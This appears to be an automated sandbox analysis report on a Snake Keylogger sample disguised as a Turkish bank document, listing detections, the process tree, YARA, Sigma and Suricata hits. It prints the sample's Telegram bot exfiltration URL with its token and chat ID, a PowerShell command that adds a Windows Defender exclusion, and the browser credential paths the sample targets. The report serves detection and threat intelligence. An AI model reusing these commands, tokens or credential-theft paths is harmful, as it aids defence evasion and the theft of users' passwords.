Edit tour

Windows Analysis Report
.05.2024.exe

Overview

General Information

Sample name:	.05.2024.exe renamed because original name is a hash value
Original sample name:	internet mteri belirteci ve ifresi _ turkiye ziraat__11055699-1034 nolu TICARI 28.05.2024.exe
Analysis ID:	1520513
MD5:	d3720192678d263171733ef9ba7fa67c
SHA1:	1215ed86a8d470428d98cfe91eafb13c491dbcb4
SHA256:	e5c2ca734e0aaf255809667c558bad65384fe32f5a5fa2b7152cf01958916943
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Moves itself to temp directory

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

.05.2024.exe (PID: 4296 cmdline: "C:\Users\user\Desktop\.05.2024.exe" MD5: D3720192678D263171733EF9BA7FA67C)

powershell.exe (PID: 968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7400 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

.05.2024.exe (PID: 1424 cmdline: "C:\Users\user\Desktop\.05.2024.exe" MD5: D3720192678D263171733EF9BA7FA67C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc", "Chat_id": "-4209622687", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14476:$a1: get_encryptedPassword 0x1475a:$a2: get_encryptedUsername 0x14272:$a3: get_timePasswordChanged 0x1436d:$a4: get_passwordField 0x1448c:$a5: set_encryptedPassword 0x15b1b:$a7: get_logins 0x15a7e:$a10: KeyLoggerEventArgs 0x156e9:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19434:$x1: $%SMTPDV$ 0x17df8:$x2: $#TheHashHere%& 0x193dc:$x3: %FTPDV$ 0x17d98:$x4: $%TelegramDv$ 0x156e9:$x5: KeyLoggerEventArgs 0x15a7e:$x5: KeyLoggerEventArgs 0x19400:$m2: Clipboard Logs ID 0x1963e:$m2: Screenshot Logs ID 0x1974e:$m2: keystroke Logs ID 0x19a28:$m3: SnakePW 0x19616:$m4: \SnakeKeylogger\
0000000A.00000002.3748481710.000000000278C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3748481710.00000000026D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x159586:$a1: get_encryptedPassword 0x1797a6:$a1: get_encryptedPassword 0x1997c6:$a1: get_encryptedPassword 0x15986a:$a2: get_encryptedUsername 0x179a8a:$a2: get_encryptedUsername 0x199aaa:$a2: get_encryptedUsername 0x159382:$a3: get_timePasswordChanged 0x1795a2:$a3: get_timePasswordChanged 0x1995c2:$a3: get_timePasswordChanged 0x15947d:$a4: get_passwordField 0x17969d:$a4: get_passwordField 0x1996bd:$a4: get_passwordField 0x15959c:$a5: set_encryptedPassword 0x1797bc:$a5: set_encryptedPassword 0x1997dc:$a5: set_encryptedPassword 0x15ac2b:$a7: get_logins 0x17ae4b:$a7: get_logins 0x19ae6b:$a7: get_logins 0x15ab8e:$a10: KeyLoggerEventArgs 0x17adae:$a10: KeyLoggerEventArgs 0x19adce:$a10: KeyLoggerEventArgs
00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15e544:$x1: $%SMTPDV$ 0x17e764:$x1: $%SMTPDV$ 0x19e784:$x1: $%SMTPDV$ 0x15cf08:$x2: $#TheHashHere%& 0x17d128:$x2: $#TheHashHere%& 0x19d148:$x2: $#TheHashHere%& 0x15e4ec:$x3: %FTPDV$ 0x17e70c:$x3: %FTPDV$ 0x19e72c:$x3: %FTPDV$ 0x15cea8:$x4: $%TelegramDv$ 0x17d0c8:$x4: $%TelegramDv$ 0x19d0e8:$x4: $%TelegramDv$ 0x15a7f9:$x5: KeyLoggerEventArgs 0x15ab8e:$x5: KeyLoggerEventArgs 0x17aa19:$x5: KeyLoggerEventArgs 0x17adae:$x5: KeyLoggerEventArgs 0x19aa39:$x5: KeyLoggerEventArgs 0x19adce:$x5: KeyLoggerEventArgs 0x15e510:$m2: Clipboard Logs ID 0x15e74e:$m2: Screenshot Logs ID 0x15e85e:$m2: keystroke Logs ID
Process Memory Space: .05.2024.exe PID: 4296	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: .05.2024.exe PID: 4296	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: .05.2024.exe PID: 4296	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb0dc:$a1: get_encryptedPassword 0xb3b6:$a2: get_encryptedUsername 0xaee2:$a3: get_timePasswordChanged 0xafdd:$a4: get_passwordField 0xb0f2:$a5: set_encryptedPassword 0xd5c9:$a7: get_logins 0xd52c:$a10: KeyLoggerEventArgs 0xd197:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: .05.2024.exe PID: 4296	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xd197:$x5: KeyLoggerEventArgs 0xd52c:$x5: KeyLoggerEventArgs 0xde33:$x5: KeyLoggerEventArgs 0xe194:$x5: KeyLoggerEventArgs 0xf76b:$m2: Clipboard Logs ID 0xf871:$m2: Screenshot Logs ID 0xf8c7:$m2: keystroke Logs ID 0xf9fc:$m3: SnakePW 0xf85d:$m4: \SnakeKeylogger\
Process Memory Space: .05.2024.exe PID: 1424	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: .05.2024.exe PID: 1424	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: .05.2024.exe PID: 1424	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf17b:$a1: get_encryptedPassword 0xf455:$a2: get_encryptedUsername 0xef81:$a3: get_timePasswordChanged 0xf07c:$a4: get_passwordField 0xf191:$a5: set_encryptedPassword 0x11668:$a7: get_logins 0x115cb:$a10: KeyLoggerEventArgs 0x11236:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: .05.2024.exe PID: 1424	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x11236:$x5: KeyLoggerEventArgs 0x115cb:$x5: KeyLoggerEventArgs 0x11ed2:$x5: KeyLoggerEventArgs 0x12233:$x5: KeyLoggerEventArgs 0x1380a:$m2: Clipboard Logs ID 0x13910:$m2: Screenshot Logs ID 0x13966:$m2: keystroke Logs ID 0x127:$m3: SnakePW 0x333:$m3: SnakePW 0x3d79:$m3: SnakePW 0xc5bb:$m3: SnakePW 0xca64:$m3: SnakePW 0xdcf7:$m3: SnakePW 0x13a9b:$m3: SnakePW 0x165f8:$m3: SnakePW 0x1692a:$m3: SnakePW 0x16b36:$m3: SnakePW 0x16d43:$m3: SnakePW 0x1885b:$m3: SnakePW 0x18c73:$m3: SnakePW 0x1a3e7:$m3: SnakePW
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2..05.2024.exe.36e1130.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2..05.2024.exe.36e1130.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12876:$a1: get_encryptedPassword 0x12b5a:$a2: get_encryptedUsername 0x12672:$a3: get_timePasswordChanged 0x1276d:$a4: get_passwordField 0x1288c:$a5: set_encryptedPassword 0x13f1b:$a7: get_logins 0x13e7e:$a10: KeyLoggerEventArgs 0x13ae9:$a11: KeyLoggerEventArgsEventHandler
4.2..05.2024.exe.36e1130.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a214:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19446:$a3: \Google\Chrome\User Data\Default\Login Data 0x19879:$a4: \Orbitum\User Data\Default\Login Data 0x1a8b8:$a5: \Kometa\User Data\Default\Login Data
4.2..05.2024.exe.36e1130.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13449:$s1: UnHook 0x13450:$s2: SetHook 0x13458:$s3: CallNextHook 0x13465:$s4: _hook
4.2..05.2024.exe.36e1130.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17834:$x1: $%SMTPDV$ 0x161f8:$x2: $#TheHashHere%& 0x177dc:$x3: %FTPDV$ 0x16198:$x4: $%TelegramDv$ 0x13ae9:$x5: KeyLoggerEventArgs 0x13e7e:$x5: KeyLoggerEventArgs 0x17800:$m2: Clipboard Logs ID 0x17a3e:$m2: Screenshot Logs ID 0x17b4e:$m2: keystroke Logs ID 0x17e28:$m3: SnakePW 0x17a16:$m4: \SnakeKeylogger\
10.2..05.2024.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2..05.2024.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
10.2..05.2024.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14676:$a1: get_encryptedPassword 0x1495a:$a2: get_encryptedUsername 0x14472:$a3: get_timePasswordChanged 0x1456d:$a4: get_passwordField 0x1468c:$a5: set_encryptedPassword 0x15d1b:$a7: get_logins 0x15c7e:$a10: KeyLoggerEventArgs 0x158e9:$a11: KeyLoggerEventArgsEventHandler
10.2..05.2024.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c014:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b246:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b679:$a4: \Orbitum\User Data\Default\Login Data 0x1c6b8:$a5: \Kometa\User Data\Default\Login Data
10.2..05.2024.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15249:$s1: UnHook 0x15250:$s2: SetHook 0x15258:$s3: CallNextHook 0x15265:$s4: _hook
10.2..05.2024.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19634:$x1: $%SMTPDV$ 0x17ff8:$x2: $#TheHashHere%& 0x195dc:$x3: %FTPDV$ 0x17f98:$x4: $%TelegramDv$ 0x158e9:$x5: KeyLoggerEventArgs 0x15c7e:$x5: KeyLoggerEventArgs 0x19600:$m2: Clipboard Logs ID 0x1983e:$m2: Screenshot Logs ID 0x1994e:$m2: keystroke Logs ID 0x19c28:$m3: SnakePW 0x19816:$m4: \SnakeKeylogger\
4.2..05.2024.exe.36c0f10.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2..05.2024.exe.36c0f10.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12876:$a1: get_encryptedPassword 0x12b5a:$a2: get_encryptedUsername 0x12672:$a3: get_timePasswordChanged 0x1276d:$a4: get_passwordField 0x1288c:$a5: set_encryptedPassword 0x13f1b:$a7: get_logins 0x13e7e:$a10: KeyLoggerEventArgs 0x13ae9:$a11: KeyLoggerEventArgsEventHandler
4.2..05.2024.exe.36c0f10.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a214:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19446:$a3: \Google\Chrome\User Data\Default\Login Data 0x19879:$a4: \Orbitum\User Data\Default\Login Data 0x1a8b8:$a5: \Kometa\User Data\Default\Login Data
4.2..05.2024.exe.36c0f10.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13449:$s1: UnHook 0x13450:$s2: SetHook 0x13458:$s3: CallNextHook 0x13465:$s4: _hook
4.2..05.2024.exe.36c0f10.5.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17834:$x1: $%SMTPDV$ 0x161f8:$x2: $#TheHashHere%& 0x177dc:$x3: %FTPDV$ 0x16198:$x4: $%TelegramDv$ 0x13ae9:$x5: KeyLoggerEventArgs 0x13e7e:$x5: KeyLoggerEventArgs 0x17800:$m2: Clipboard Logs ID 0x17a3e:$m2: Screenshot Logs ID 0x17b4e:$m2: keystroke Logs ID 0x17e28:$m3: SnakePW 0x17a16:$m4: \SnakeKeylogger\
4.2..05.2024.exe.36e1130.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2..05.2024.exe.36e1130.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2..05.2024.exe.36e1130.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14676:$a1: get_encryptedPassword 0x34696:$a1: get_encryptedPassword 0x1495a:$a2: get_encryptedUsername 0x3497a:$a2: get_encryptedUsername 0x14472:$a3: get_timePasswordChanged 0x34492:$a3: get_timePasswordChanged 0x1456d:$a4: get_passwordField 0x3458d:$a4: get_passwordField 0x1468c:$a5: set_encryptedPassword 0x346ac:$a5: set_encryptedPassword 0x15d1b:$a7: get_logins 0x35d3b:$a7: get_logins 0x15c7e:$a10: KeyLoggerEventArgs 0x35c9e:$a10: KeyLoggerEventArgs 0x158e9:$a11: KeyLoggerEventArgsEventHandler 0x35909:$a11: KeyLoggerEventArgsEventHandler
4.2..05.2024.exe.36e1130.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c014:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c034:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b246:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b266:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b679:$a4: \Orbitum\User Data\Default\Login Data 0x3b699:$a4: \Orbitum\User Data\Default\Login Data 0x1c6b8:$a5: \Kometa\User Data\Default\Login Data 0x3c6d8:$a5: \Kometa\User Data\Default\Login Data
4.2..05.2024.exe.36e1130.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15249:$s1: UnHook 0x35269:$s1: UnHook 0x15250:$s2: SetHook 0x35270:$s2: SetHook 0x15258:$s3: CallNextHook 0x35278:$s3: CallNextHook 0x15265:$s4: _hook 0x35285:$s4: _hook
4.2..05.2024.exe.36e1130.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19634:$x1: $%SMTPDV$ 0x39654:$x1: $%SMTPDV$ 0x17ff8:$x2: $#TheHashHere%& 0x38018:$x2: $#TheHashHere%& 0x195dc:$x3: %FTPDV$ 0x395fc:$x3: %FTPDV$ 0x17f98:$x4: $%TelegramDv$ 0x37fb8:$x4: $%TelegramDv$ 0x158e9:$x5: KeyLoggerEventArgs 0x15c7e:$x5: KeyLoggerEventArgs 0x35909:$x5: KeyLoggerEventArgs 0x35c9e:$x5: KeyLoggerEventArgs 0x19600:$m2: Clipboard Logs ID 0x1983e:$m2: Screenshot Logs ID 0x1994e:$m2: keystroke Logs ID 0x39620:$m2: Clipboard Logs ID 0x3985e:$m2: Screenshot Logs ID 0x3996e:$m2: keystroke Logs ID 0x19c28:$m3: SnakePW 0x39c48:$m3: SnakePW 0x19816:$m4: \SnakeKeylogger\
4.2..05.2024.exe.36c0f10.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2..05.2024.exe.36c0f10.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2..05.2024.exe.36c0f10.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14676:$a1: get_encryptedPassword 0x34896:$a1: get_encryptedPassword 0x548b6:$a1: get_encryptedPassword 0x1495a:$a2: get_encryptedUsername 0x34b7a:$a2: get_encryptedUsername 0x54b9a:$a2: get_encryptedUsername 0x14472:$a3: get_timePasswordChanged 0x34692:$a3: get_timePasswordChanged 0x546b2:$a3: get_timePasswordChanged 0x1456d:$a4: get_passwordField 0x3478d:$a4: get_passwordField 0x547ad:$a4: get_passwordField 0x1468c:$a5: set_encryptedPassword 0x348ac:$a5: set_encryptedPassword 0x548cc:$a5: set_encryptedPassword 0x15d1b:$a7: get_logins 0x35f3b:$a7: get_logins 0x55f5b:$a7: get_logins 0x15c7e:$a10: KeyLoggerEventArgs 0x35e9e:$a10: KeyLoggerEventArgs 0x55ebe:$a10: KeyLoggerEventArgs
4.2..05.2024.exe.36c0f10.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c014:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c234:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5c254:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b246:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b466:$a3: \Google\Chrome\User Data\Default\Login Data 0x5b486:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b679:$a4: \Orbitum\User Data\Default\Login Data 0x3b899:$a4: \Orbitum\User Data\Default\Login Data 0x5b8b9:$a4: \Orbitum\User Data\Default\Login Data 0x1c6b8:$a5: \Kometa\User Data\Default\Login Data 0x3c8d8:$a5: \Kometa\User Data\Default\Login Data 0x5c8f8:$a5: \Kometa\User Data\Default\Login Data
4.2..05.2024.exe.36c0f10.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15249:$s1: UnHook 0x35469:$s1: UnHook 0x55489:$s1: UnHook 0x15250:$s2: SetHook 0x35470:$s2: SetHook 0x55490:$s2: SetHook 0x15258:$s3: CallNextHook 0x35478:$s3: CallNextHook 0x55498:$s3: CallNextHook 0x15265:$s4: _hook 0x35485:$s4: _hook 0x554a5:$s4: _hook
4.2..05.2024.exe.36c0f10.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19634:$x1: $%SMTPDV$ 0x39854:$x1: $%SMTPDV$ 0x59874:$x1: $%SMTPDV$ 0x17ff8:$x2: $#TheHashHere%& 0x38218:$x2: $#TheHashHere%& 0x58238:$x2: $#TheHashHere%& 0x195dc:$x3: %FTPDV$ 0x397fc:$x3: %FTPDV$ 0x5981c:$x3: %FTPDV$ 0x17f98:$x4: $%TelegramDv$ 0x381b8:$x4: $%TelegramDv$ 0x581d8:$x4: $%TelegramDv$ 0x158e9:$x5: KeyLoggerEventArgs 0x15c7e:$x5: KeyLoggerEventArgs 0x35b09:$x5: KeyLoggerEventArgs 0x35e9e:$x5: KeyLoggerEventArgs 0x55b29:$x5: KeyLoggerEventArgs 0x55ebe:$x5: KeyLoggerEventArgs 0x19600:$m2: Clipboard Logs ID 0x1983e:$m2: Screenshot Logs ID 0x1994e:$m2: keystroke Logs ID
4.2..05.2024.exe.357c318.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2..05.2024.exe.357c318.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2..05.2024.exe.357c318.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15926e:$a1: get_encryptedPassword 0x17948e:$a1: get_encryptedPassword 0x1994ae:$a1: get_encryptedPassword 0x159552:$a2: get_encryptedUsername 0x179772:$a2: get_encryptedUsername 0x199792:$a2: get_encryptedUsername 0x15906a:$a3: get_timePasswordChanged 0x17928a:$a3: get_timePasswordChanged 0x1992aa:$a3: get_timePasswordChanged 0x159165:$a4: get_passwordField 0x179385:$a4: get_passwordField 0x1993a5:$a4: get_passwordField 0x159284:$a5: set_encryptedPassword 0x1794a4:$a5: set_encryptedPassword 0x1994c4:$a5: set_encryptedPassword 0x15a913:$a7: get_logins 0x17ab33:$a7: get_logins 0x19ab53:$a7: get_logins 0x15a876:$a10: KeyLoggerEventArgs 0x17aa96:$a10: KeyLoggerEventArgs 0x19aab6:$a10: KeyLoggerEventArgs
4.2..05.2024.exe.357c318.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x159e41:$s1: UnHook 0x17a061:$s1: UnHook 0x19a081:$s1: UnHook 0x159e48:$s2: SetHook 0x17a068:$s2: SetHook 0x19a088:$s2: SetHook 0x159e50:$s3: CallNextHook 0x17a070:$s3: CallNextHook 0x19a090:$s3: CallNextHook 0x159e5d:$s4: _hook 0x17a07d:$s4: _hook 0x19a09d:$s4: _hook
4.2..05.2024.exe.357c318.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15e22c:$x1: $%SMTPDV$ 0x17e44c:$x1: $%SMTPDV$ 0x19e46c:$x1: $%SMTPDV$ 0x15cbf0:$x2: $#TheHashHere%& 0x17ce10:$x2: $#TheHashHere%& 0x19ce30:$x2: $#TheHashHere%& 0x15e1d4:$x3: %FTPDV$ 0x17e3f4:$x3: %FTPDV$ 0x19e414:$x3: %FTPDV$ 0x15cb90:$x4: $%TelegramDv$ 0x17cdb0:$x4: $%TelegramDv$ 0x19cdd0:$x4: $%TelegramDv$ 0x15a4e1:$x5: KeyLoggerEventArgs 0x15a876:$x5: KeyLoggerEventArgs 0x17a701:$x5: KeyLoggerEventArgs 0x17aa96:$x5: KeyLoggerEventArgs 0x19a721:$x5: KeyLoggerEventArgs 0x19aab6:$x5: KeyLoggerEventArgs 0x15e1f8:$m2: Clipboard Logs ID 0x15e436:$m2: Screenshot Logs ID 0x15e546:$m2: keystroke Logs ID
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\.05.2024.exe", ParentImage: C:\Users\user\Desktop\.05.2024.exe, ParentProcessId: 4296, ParentProcessName: .05.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe", ProcessId: 968, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\.05.2024.exe", ParentImage: C:\Users\user\Desktop\.05.2024.exe, ParentProcessId: 4296, ParentProcessName: .05.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe", ProcessId: 968, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T12:52:11.370989+0200	2803305	3	Unknown Traffic	192.168.2.7	49704	188.114.96.3	443	TCP
2024-09-27T12:52:18.729677+0200	2803305	3	Unknown Traffic	192.168.2.7	49716	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T12:52:09.595580+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49702	193.122.130.0	80	TCP
2024-09-27T12:52:10.783100+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49702	193.122.130.0	80	TCP
2024-09-27T12:52:12.475314+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49705	193.122.130.0	80	TCP
2024-09-27T12:52:14.064400+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49708	193.122.130.0	80	TCP

ETPRO MALWARE Snake Keylogger Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T12:52:27.432539+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49724	149.154.167.220	443	TCP
2024-09-27T12:52:37.592127+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49725	149.154.167.220	443	TCP
2024-09-27T12:52:38.549129+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49726	149.154.167.220	443	TCP
2024-09-27T12:52:39.491730+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49727	149.154.167.220	443	TCP
2024-09-27T12:52:40.422177+0200	2853006	1	A Network Trojan was detected	192.168.2.7	49728	149.154.167.220	443	TCP
